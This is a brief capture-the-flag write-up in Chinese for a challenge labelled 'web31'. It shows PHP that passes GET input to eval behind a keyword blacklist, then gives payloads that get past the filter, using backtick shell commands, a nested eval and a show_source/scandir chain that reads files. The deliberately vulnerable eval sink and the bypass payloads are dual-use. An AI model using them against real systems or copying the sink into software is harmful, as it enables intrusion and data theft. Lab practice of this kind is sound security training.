web31
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,sstem,php,cat,sort,shell,点,空格,单引号
几种失败的姿势
1.?c=echo `tac fla?.*`;
2.?c=echo `tac fla?.*`;
3. ?c=`cp fla?.* 1.txt`;
姿势一,嵌套eval,逃逸参数
姿势二,show_source(next(array_reverse(scandir(pos(localeconv())))));
array用于创建数组
array_reverse将数组倒序输出
pos函数返回数组中当前元素(指针指向)的值